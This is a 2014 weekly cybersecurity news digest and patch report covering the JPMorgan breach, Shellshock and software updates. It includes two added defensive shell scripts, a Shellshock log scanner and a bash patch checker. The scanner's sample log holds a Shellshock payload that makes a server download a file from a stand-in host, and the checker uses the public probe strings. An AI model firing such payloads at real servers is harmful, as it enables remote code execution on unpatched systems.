Monday, October 06, 2014

Cyber Security News, Education and Vulnerability Patch Report for the Week of October 6, 2014


From our friends at Citadel Information Group

Cyber Crime

JPMorgan Chase Hacking Affects 76 Million Households: A cyberattack this summer on JPMorgan Chase compromised the accounts of 76 million households and seven million small businesses, a tally that dwarfs previous estimates by the bank and puts the intrusion among the largest ever. The New York Times, October 2, 2014
U.S. retail chains and banks no match for new breed of hackers: Since December, a rash of hacks has hit retailers, a major bank, and even a gourmet sandwich chain. Target, Home Depot, JPMorgan Chase, and Jimmy John’s had complex malware unleashed into their systems. Over 100 million customers saw their credit cards boosted by cyber thieves, along with home addresses, Social Security numbers, and other personal data. Much of the card information ended up for sale on cyber black markets like VentureBeat, September 29, 2014
Supervalu announces another possible data breach, finds malware on point-of-sale systems: The grocery store chain says it discovered malware installed on some of its point-of-sale systems a little over a month after announcing its computer systems were hacked. Fortune, September 29, 2014
Signature Systems Breach Expands: Signature Systems Inc., the point-of-sale vendor blamed for a credit and debit card breach involving some 216 Jimmy John’s sandwich shop locations, now says the breach also may have jeopardized customer card numbers at nearly 100 other independent restaurants across the country that use its products. KrebsOnSecurity, September 26, 2014

Financial Cyber Security

Microsoft partners with financial services industry to fight cyber crime: Microsoft is to share cyber threat intelligence with the Financial Services Information Sharing and Analysis Center (FS-ISAC) to help fight cyber crime. ComputerWeekly, September 30, 2014

Identity Theft

We Take Your Privacy and Security. Seriously: “Please note that [COMPANY NAME] takes the security of your personal data very seriously.” If you’ve been on the Internet for any length of time, chances are very good that you’ve received at least one breach notification email or letter that includes some version of this obligatory line. But as far as lines go, this one is about as convincing as the classic break-up line, “It’s not you, it’s me.” KrebsOnSecurity September 29, 2014

Cyber Warning

Serious Hypervisor Bug Fix Causes Unexpected Cloud Downtime: The Xen Project published a security advisory yesterday about a critical vulnerability in its virtual machine and hypervisor systems that could expose public cloud servers to attacks capable of crashing host machines and even stealing small amounts of random data. The fix was made available under embargo to certain cloud service providers last week, leading to downtime as some of those providers performed emergency maintenance to resolve the vulnerability over the weekend. ThreatPost, October 2, 2014
Release of Attack Code Raises Stakes for USB Security: Rarely in security is anything an absolute, but in the case of the BadUSB research that emerged during this year’s Black Hat conference, phrases such as “completely compromised” and “undetectable” paint a grim picture for the security of devices that communicate over USB. ThreatPost, October 2, 2014
Voice Hackers Will Soon Be Talking Their Way Into Your Technology: Voice-activated technology is so vulnerable to attack that users should immediately disable speech recognition on all their devices, a security researcher at AVG has warned. Forbes, September 29, 2014
Security Experts Expect ‘Shellshock’ Software Bug in Bash to Be Significant: Long before the commercial success of the Internet, Brian J. Fox invented one of its most widely used tools. The New York Times, September 25, 2014

Cyber Security Management

Cyber Risk Series: Beazley Underwriter says a breach alone is not a disaster, but mishandling it is: Stan Stahl, President of Citadel Information Group, sits with Serene Davis, an Underwriter with Beazley, to discuss cyber breaches and what companies can do to protect themselves from a major loss. World Risk and Insurance News, 2014
Five Truths About Cyber Security: The average total cost of a data breach is now $3.5 million globally, a 15% rise from last year, according to a 2014 study by the Ponemon Institute. The likelihood of a company having a data breach “involving 10,000 records or more stands at 22%,” finds the same study. CFO, September 23, 2014

Cyber Security Management – Cyber Defense

WPScan Vulnerability Database a New WordPress Security Resource: WordPress’ popularity as a content management system (44 percent of CMS market share) is matched in parallel by the number of security vulnerabilities afflicting the open source platform, as well as its versatile plug-ins and themes. ThreatPost, September 29, 2014
Companies Rush to Fix Shellshock Software Bug as Hackers Launch Thousands of Attacks: A day after the Department of Homeland Security advised Internet users and corporations about a newly discovered software bug that could affect hundreds of millions of systems, hackers had already begun exploiting the bug and companies were rushing to fix the issue for their users. The New York Times, September 26, 2014
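The exploitation wave described above reached servers mainly through HTTP headers handed to CGI scripts as environment variables, so the attacker’s payload lands verbatim in ordinary web-server access logs. The script below is an added example, not part of Citadel’s report or the cited articles: it scans a constructed Apache-style log for the function-definition prefix “() {” that every Shellshock probe must carry. The log lines, client addresses (from the 192.0.2.0/24 documentation range), paths and payload host are made up for illustration.

```shell
#!/bin/sh
# Added example, not from the original report: find Shellshock probes in web logs.
# Every exploit attempt for the bash bug has to deliver the string "() {" in an
# environment variable, which for a CGI target means an HTTP header such as
# User-Agent, Referer or Cookie, and web servers log those headers verbatim.

# Constructed sample log in Apache "combined" format (addresses, paths and the
# payload host are made up; 192.0.2.0/24 and 198.51.100.0/24 are documentation ranges).
SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat >"$SAMPLE_LOG" <<'EOF'
192.0.2.10 - - [26/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'wget http://198.51.100.7/x -O /tmp/x'"
192.0.2.11 - - [26/Sep/2014:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/32.0"
192.0.2.12 - - [26/Sep/2014:10:02:17 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "(){ ignored; }; echo vulnerable" "curl/7.37.0"
192.0.2.13 - - [26/Sep/2014:10:03:40 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Macintosh) Safari/537.78"
EOF

# Print every line whose request or headers carry a function-definition prefix.
# The space after "()" is optional because real probes used both "() {" and "(){".
shellshock_hits() {
    grep -E '\(\) *[{]' "$1"
}

# Number of matching lines, for a threshold in an alerting job.
shellshock_hit_count() {
    shellshock_hits "$1" | wc -l | tr -d ' '
}

# Unique client addresses behind the probes, one per line, for blocking or enrichment.
shellshock_sources() {
    shellshock_hits "$1" | awk '{ print $1 }' | sort -u
}

# Stand-alone run: list the hits, then the sources.
echo "Hits in $SAMPLE_LOG:"
shellshock_hits "$SAMPLE_LOG"
echo "Sources:"
shellshock_sources "$SAMPLE_LOG"
```

Point `shellshock_hits` at a real access log to get the matching lines; the pattern is deliberately loose (optional whitespace) because the bash parser accepted both spellings and attackers varied them to dodge naive signatures.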

Cyber Security Management – Cyber Update

Apple Releases Patches for Shellshock Bug: Apple has released updates to insulate Mac OS X systems from the dangerous “Shellshock” bug, a pervasive vulnerability that is already being exploited in active attacks. KrebsOnSecurity, September 30, 2014

Securing the Village

FBI releases Malware Investigator portal to industry players: The FBI’s Malware Investigator portal will soon be available to security researchers, academics and businesses. ZDNet, September 30, 2014

National Cyber Security

Steptoe Cyberlaw Podcast, Episode #35: An Interview with Julian Sanchez: Our guest is Julian Sanchez, a senior fellow at the Cato Institute who studies surveillance and other issues at the intersection of technology and civil liberties. He is a founding editor of the policy blog Just Security, and recently debated another of our guests, Orin Kerr, on Apple’s recent announcement that it would no longer be able to decrypt iPhones for law enforcement. We dig into that issue in detail, asking such questions as how often encryption has actually stymied an investigation, whether “hacking” the phone is a substitute for help from the company, what this means for corporate users of iPhones, the implications for Apple (and Google) in other countries, and whether Google/Apple run a risk under current US law of lawsuits by prosecutors or by crime victims. LawFare, September 26, 2014

Cyber Security Management- Awareness

Poll: Employees Clueless About Social Engineering: Not surprisingly, our latest poll confirms that threats stemming from criminals hacking humans are all too frequently ignored. DarkReading, October 2, 2014

Cyber Insurance

Cyberinsurance Resurges In The Wake Of Mega-Breaches: Insurance policies customized for cyberattack protection are on the rise as businesses worry they could be the next Target. DarkReading, October 2, 2014

Cyber Law

Silk Road Lawyers Poke Holes in FBI’s Story: New court documents released this week by the U.S. government in its case against the alleged ringleader of the Silk Road online black market and drug bazaar suggest that the feds may have some ‘splaining to do. KrebsOnSecurity, October 2, 2014
Europe’s police need data law changes to fight cybercrime – Europol: (Reuters) – Law enforcers in Europe need greater powers to retain data for longer in order to catch cybercriminals selling discrete services that police cannot trace under existing regulations, according to a Europol report published on Monday. Reuters, September 29, 2014

Cyber Misc

FDA Releases Final Guidance on Medical Device Cybersecurity: On Wednesday, FDA released final guidance on how medical device manufacturers can better protect patient information, Clinical Innovation & Technology reports. iHealthBeat, October 2, 2014

Cyber Sunshine

ID Theft Service Customer Gets 27 Months: A Florida man was sentenced today to 27 months in prison for trying to purchase Social Security numbers and other data from an identity theft service that pulled consumer records from a subsidiary of credit bureau Experian. KrebsOnSecurity, October 1, 2014

Weekend Vulnerability and Patch Report, October 5, 2014

Important Security Updates

Apple OS X: Apple has released updates for multiple versions of OS X to fix two highly critical vulnerabilities reported in OS X Lion version 10.7.5, OS X Lion Server version 10.7.5, OS X Mountain Lion version 10.8.5, OS X Mavericks version 10.9.5. Apply OS X bash Update 1.0.
Opera: Opera has released version 24.0.1558.64 to fix moderately critical vulnerabilities. Updates are available from within the browser or from Opera’s website.
Piriform CCleaner: Piriform has released version 4.18.4844 for CCleaner. Updates are available from Piriform’s website.
Siber Systems RoboForm: Siber Systems has released a new version of RoboForm. Updates are available from within the program (look for the “Check New Version” button on the Options menu) or from the RoboForm website.
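Applying the bash update is only half the job; the check a practitioner wants is confirmation that the installed bash no longer executes code smuggled in through environment variables. The script below is an added example, not Citadel’s or Apple’s: it runs the two public Shellshock probes (the original CVE-2014-6271 trailing-command test and the CVE-2014-7169 parser follow-up, which creates a stray file named `echo`) against whichever `bash` is first on the PATH and reports a one-word status. It assumes that this bash is the one your CGI handlers and cron jobs actually use; on OS X that is /bin/bash, so put /bin first on the PATH if another bash is installed.

```shell
#!/bin/sh
# Added example, not from the original report: verify that the bash on this host
# is no longer vulnerable to Shellshock after applying the vendor update.
# Assumption: "bash" on the PATH is the bash your CGI scripts and cron jobs use.

# Prints one of: no-bash, vulnerable-6271, vulnerable-7169, patched.
shellshock_status() {
    command -v bash >/dev/null 2>&1 || { echo "no-bash"; return 0; }

    # Probe 1 (CVE-2014-6271): the exported "function" carries a trailing command.
    # Unpatched bash runs it while importing the environment and prints "vulnerable".
    if env x='() { :;}; echo vulnerable' bash -c 'echo probe' 2>/dev/null | grep -q vulnerable; then
        echo "vulnerable-6271"
        return 0
    fi

    # Probe 2 (CVE-2014-7169): the first fix left a parser bug; "echo date" is
    # misread as a redirection and creates a file named "echo" in the current dir.
    # Work in a scratch directory so a vulnerable bash cannot clobber a real file.
    scratch=$(mktemp -d)
    ( cd "$scratch" && env X='() { (a)=>\' bash -c 'echo date' ) >/dev/null 2>&1 || true
    if [ -e "$scratch/echo" ]; then
        rm -rf "$scratch"
        echo "vulnerable-7169"
        return 0
    fi
    rm -rf "$scratch"

    echo "patched"
}

# Version string of the bash under test, worth recording next to the result.
bash_version() {
    command -v bash >/dev/null 2>&1 || { echo "none"; return 0; }
    bash -c 'echo "$BASH_VERSION"'
}

# Stand-alone run.
echo "bash $(bash_version): $(shellshock_status)"
```

A “patched” result means both known variants are closed on this binary; it says nothing about other bash copies on the machine (e.g. one shipped inside an application bundle), which need the same check with that path first on the PATH.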

Current Software Versions

Adobe Flash [Windows 7: IE]
Adobe Flash [Windows 7: Firefox, Mozilla]
Adobe Flash [Windows 8: IE]
Adobe Flash [Macintosh OS X: Firefox, Opera, Safari]
Adobe Reader 11.0.09
Dropbox 2.10.30 [Citadel warns against relying on Dropbox security. We recommend files containing sensitive information be independently encrypted with a program like Axcrypt; encryption keys be at least 15 characters long; and the Dropbox password be at least 15 characters long and different from other passwords.]
Firefox 32.0.3
Google Chrome 37.0.2062.124
Internet Explorer 11.0.9600.17280
Java SE 7 Update 67 [Citadel recommends removing or disabling Java from your browser. Java is a major source of cyber criminal exploits. It is not needed for most internet browsing. If you have a particular web site that requires Java, Citadel recommends using a two-browser approach to minimize risk. If you normally browse the Web with Firefox, for example, disable the Java plugin in Firefox and use an alternative browser — such as Chrome, IE9, Safari, etc — with Java enabled to browse only the sites that require it.]
QuickTime 7.7.5
Safari 5.1.7 
Safari 7.1 [Mac OS X]

Newly Announced Unpatched Vulnerabilities

For an updated list of previously announced Unpatched Vulnerabilities, please see the resources section of Citadel’s website.

For Your IT Department

Cisco Multiple Products: Secunia reports Cisco has released updates for IOS, IOS XE, WebEx Meetings Server, TelePresence IP Gateway Series, TelePresence ISDN, WAAS, and others. Apply available updates. Secunia reports unpatched vulnerabilities in IOS XE, ACE Application Control Engine Appliance 3.x, Aggregation Services Routers (ASR), ASA 5500 Series Adaptive Security Appliances, Content Delivery Engine Series, Digital Media Manager 5.x, Edge 300 Digital Media Player, Edge 340 Digital Media Player, Identity Services Engine (ISE) 1.x, Intrusion Prevention System (IPS) 7.2, IOS 15.0, IOS 15.1, IOS 15.2, IP Interoperability and Collaboration System (IPICS) Server 8.x, IP Video Phone E20, IPS 4200 Series Sensor, MDS 9000 Series, Media Experience Engine (MXE) 3000 Series, NAC Appliance 2.x, Nexus 4000 Series Switches, Nexus 5000 Series Switches, Nexus 7000 Series Switches, Nexus 9000 Series Switches, SCE 8000 Series (Service Control Engine), Secure Access Control System (ACS) 5.x, TelePresence Conductor, TelePresence Integrator C Series, TelePresence Systems (CTS), Unified Computing System (UCS) 2.x, Emergency Responder 9.x, Intelligent Automation for Cloud 4.x, Nexus 1000V 5.x, Prime Data Center Network Manager (DCNM) 7.x, TelePresence Manager 1.x, TelePresence Video Communication Server (VCS), UCS Central Software 3.x, Unified Communications Licensing 10.x, Unified Communications Manager 7.x, 8.x, 9.x, and 10.x, Unified Communications Manager IM and Presence Service 9.x and 10.x, Unified Intelligence Center 10.x, Unity Connection 9.x. No official solution is available.
Novell Open Enterprise Server: Secunia reports Novell has released an update to Open Enterprise Server to fix two highly critical vulnerabilities in Novell Open Enterprise Server 2 (OES 2) Linux Support Pack 3 and Novell Open Enterprise Server 11 (OES 11) Linux Support Pack 1. Apply updated packages via the zypper package manager.
If you are responsible for the security of your computer, Citadel’s Weekend Vulnerability and Patch Report is for you. We strongly urge you to take action to keep your workstation patched and updated.
If someone else is responsible for the security of your computer, forward our Weekend Vulnerability and Patch Report to them and follow up to make sure your computer has been patched and updated.
Vulnerability management is a key element of cyber security management. Cyber criminals take over user computers by writing computer programs that “exploit” vulnerabilities in operating systems (Windows, Apple OS, etc.) and application programs (Adobe Acrobat, Office, Flash, Java, etc.). When software companies find a vulnerability, they usually issue an update patch to fix the code running on their customers’ computers.
Citadel publishes our Weekend Vulnerability and Patch Report to alert readers to some of the week’s important updates and vulnerabilities. Our focus is on software typically found in the small or home office (SOHO) or that users are likely to have on their home computer. The report is not intended to be a thorough listing of updates and vulnerabilities.
Copyright © 2014 Citadel Information Group. All rights reserved.